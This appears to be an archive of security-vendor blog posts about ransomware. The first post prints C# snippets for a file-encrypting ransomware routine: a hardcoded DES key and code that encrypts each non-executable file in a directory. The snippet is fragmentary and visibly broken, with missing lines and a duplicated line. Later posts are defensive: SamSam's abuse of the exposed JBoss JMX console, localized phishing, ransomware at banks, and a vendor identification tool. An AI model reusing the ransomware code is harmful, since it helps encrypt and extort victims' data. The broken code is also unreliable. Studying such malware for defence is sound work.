More sophisticated ransomware will attempt to learn the idle time of the infected computer — when there’s CPU available– and slip in the encryption processing at appropriate times to avoid detection.

Enough talk, here’s the code.

First snippet: Choose a random key to encrypt the data with:

string key = "R?\n??i??";

Basically you can choose any key that you like, remember that we are going to choose symmetric algorithm so the key will be used for encrypting and decrypting as well.

Second snippet:   Encrypt an entire directory contents:

private static void EncryptDir(string d,int mili)
            DirectoryInfo dirtoencrypt = new DirectoryInfo(d);
            FileInfo[] file;
            file = dirtoencrypt.GetFiles();
            foreach (FileInfo currentFile in file)
                if (currentFile.Extension.ToLower() != ".exe")
                    string key = "R?\n??i??";
                    EncryptFile(currentFile.FullName, currentFile.FullName + ".axx", key);


Third Snippet: The encrypting function, taken directly from MSDN (https://support.microsoft.com/en-us/kb/307010)

static void EncryptFile(string sInputFilename, \
static void EncryptFile(string sInputFilename, string sOutputFilename, string sKey)
            FileStream fsInput = new FileStream(sInputFilename,

            FileStream fsEncrypted = new FileStream(sOutputFilename,
            DESCryptoServiceProvider DES = new DESCryptoServiceProvider();
            DES.Key = ASCIIEncoding.ASCII.GetBytes(sKey);
            DES.IV = ASCIIEncoding.ASCII.GetBytes(sKey);
            ICryptoTransform desencrypt = DES.CreateEncryptor();
            CryptoStream cryptostream = new CryptoStream(fsEncrypted,

            byte[] bytearrayinput = new byte[fsInput.Length];
            fsInput.Read(bytearrayinput, 0, bytearrayinput.Length);
            cryptostream.Write(bytearrayinput, 0, bytearrayinput.Length);


That’s it!

A malicious tool with tons of damage potential in less than a 100 lines of code and under 10kb after compiling.

I’ll put together more pieces of the ransomware puzzle in another post.

New SamSam Ransomware Exploiting Old JBoss Vulnerability

New SamSam Ransomware Exploiting Old JBoss Vulnerability

One of the lessons learned from the uptick in ransomware attacks is that it pays to keep your security patches up to date. A few months ago the SamSam/Samas malware was (and is still) having great success primarily against healthcare companies and hospitals.

The attack vector, though, was not based on phishing or social engineering. SamSam instead exploits a very old (and surprising) vulnerability in JBoss, Red Hat’s Java-based web server environment.

No Phishing

JMX is the administrative console web app for JBOSS — yes, everything starts with a J. Unfortunately, by default, the JMX home page is available externally without any authentication checks.

Like any good admin took, JMX gives you access to some basic functions including running Java code.

Are you thinking what I’m thinking?

Hackers discovering this JBoss vulnerability quickly realized that if they could upload a simple shell they were on their way to controlling the server.

And that’s the way this exploit works. If you want to read the technical details and the coding involved, you can google on “jboss vulnerability”.

This is a very well-known security hole – the CVE dates back to 2010—and it has since been patched.

But it has come back into the limelight because the SamsSam ransomware has very successfully used it against healthcare orgs, which for whatever reasons are more likely to have JBoss installations.

Once the cyber thieves gain entry through JMX, they upload the ransomware. And start collecting the fees. No phishing required.

How bad is the problem?

According to Cisco security researchers, there could be as many as 3.2 million installations at risk.

Remote Access Trojan by Any other Name

Attackers can find sites that have JBoss by Google dorking, which allows you to search for part of the telltale URL – in this case “jmx-console”—that indicates a JBoss server on an exposed site.


It’s an admin console! It’s a remote access trojan! It’s both!

In looking at the JBoss attack techniques, I saw lots of code where the JMX interface acts as starting point to uploading and launching other software, say a reverse shell. So the vulnerability leaves open other attacks, not necessarily ransomware.

To put it bluntly, the JMX interface is an unintentional Remote Access Trojan or RAT, which we wrote about in our pen testing series.

Normally the attacker has to first install the RAT, but with these unpatched Red Hat installations it’s there — gasp!— waiting for them.

Maybe it’s a good time now to bring all your systems up to date with the latest security patches — I’m talking to you healthcare orgs!


One Take Away from Black Hat 2016: Designer Ransomware!

One Take Away from Black Hat 2016: Designer Ransomware!

We had an amazing week at Black Hat 2016.  One topic that was on attendees’ minds— besides hacking Jeeps and chip-and-pin technology — was ransomware. A security analysis firm now warns us that ransomware has become more clickable because the thieves are localizing the phish mail.

You should watch the video below for the full interview with an analyst from Sophos.

The key takeaway is that the ransomware designers have learned some marketing tricks from non-criminal enterprises.

These digital bandits know to focus their efforts on richer countries that can afford to pay the ransomware and then customize the email contents using very local companies and brands.

So you may receive a nicely crafted email with the name and logo of, say, a utility company or government agency. The hackers have gotten better at working out the location of the victims based on their IP addresses.

With the attackers improved powers of “market segmentation”, we’re a long way from one-size-fits-all Nigerian 419 schemes!

You and I could easily spot that the sender of the email containing the malware is phony – see our phish mail post — but the average employee might not.

Of course, your company should be boosting employee security budgets to make it less likely that workers will click on an UPS invoice.

More than that, though, companies should lower their overall risk exposure surface. It just makes sense, as Rob has just pointed out, to limit the files that the attacker can access in the first place.

We’ll be talking more about ransomware next week when we present the results of a custom survey that we’re finishing up.



Banks Secretly and Silently Struggling with Ransomware

Banks Secretly and Silently Struggling with Ransomware

“You’re almost certainly not going to hear about successful ransomware attacks on banks,” says Fraud Prevention Expert, Ross Hogan in an interview with Banking Exchange. “It is probably one of the most catastrophic events that a bank could suffer.”


If a financial institution made a public announcement that the firm was infected with ransomware, the brand damage would be irreparable.

Moreover, it could potentially create panic amongst customers, ensuing a bank run. Customers might decide to withdraw cash from a financial institution, destabilizing a bank to where it runs out of cash and unexpectedly face bankruptcy. The result of this scenario would be – from an economic standpoint – catastrophic.

And NO ONE wants this to happen.

But we know financial institutions are a target

How? Ransomware does not discriminate.

All it takes is one phishing click or a wrong installation and your computer or your entire network could take a hit. (Listen to our podcast: Journey of a Ransomware Attack)

“They’re not just trying to infect your workstation and lock your files on you workstation; they’re trying to go for any network drive they can find,” says Editor-in-Chief of Cyberheist Stu Sjouwerman. “That’s where the risk is. This is what happened at Presbyterian Hospital in Hollywood.”

Not only has ransomware infected hospitals, but schools, police departments, and city departments – all institutions that we rely on.

The financial industry took note. Last year, the Federal Financial Institutions Examination Council issued a ransomware warning about the frequency and severity of the threat.

What banks can do

Be proactive and learn how you can protect your organization from the inside out:

How Varonis helps financial services stop and prevent ransomware

We’ve been working with organizations from all verticals to prevent ransomware. And here are a few quotes from a few financial institutions that describe their experience with how Varonis helps them stop and prevent ransomware:

  • “Even though we have a state of the art firewall and new antivirus software, neither was able to detect or stop Crypto. Varonis DatAlert not only sent us email alerts when a user got hit by Crypto, but also logged that user out before the virus could do any damage to network shares. That alone justified its cost.” – Southern California Wealth Management Firm
  • “Our endpoint protection had detected the virus on a computer and had appropriately removed the code, but not before it had kicked off the encryption process. The point to note here is that although the endpoint had isolated the problem it wasn’t able to kill the process. Varonis was able to identify the process and then remediate the issue and we can prevent it from happening again.” – A Northwestern Bank
  • “ Of all the expensive security products we’ve purchased, DatAlert is the only solution that has done, and is doing, all of the alerting and notification of anomalous behavior, especially ransomware. ” – A Major Bank in Western Canada



How to Identify Ransomware: Use Our New Identification Tool

How to Identify Ransomware: Use Our New Identification Tool

Sadly, ransomware infections are routine enough that IT departments have started to develop standardized procedures for rapidly quarantining infected machines, determining the extent of damage and then attempting recovery operations..

For help with locking off computers performing suspicious actions (like modifying thousands of files in a minute), our DatAlert customers are using custom rules and scripts tied to behaviors. They’re running reports in DatAdvantage to rapidly find exactly which files were touched on which servers. However, until recently Varonis has been unable to help with recovery efforts.

While restoring files from backup is the best recovery option, often you’re still left with files which were created since the last backup was taken or in cases where the infection wasn’t promptly caught: where the files encrypted by the ransomware themselves were backed up.

If you’re in this situation, you need to:

    1. Identify the strain of ransomware you’ve been hit with.
    2. Locate an unlocking application (if any) for that strain.

To help with both of these recovery tasks, we’ve created a Ransomware Identifier. Enter either the file extension of the ransomware encrypted files, or the name of the ransom note file into the Ransomware Identifier search engine and rapidly get your answers.

Try the Ransomware Identifier Now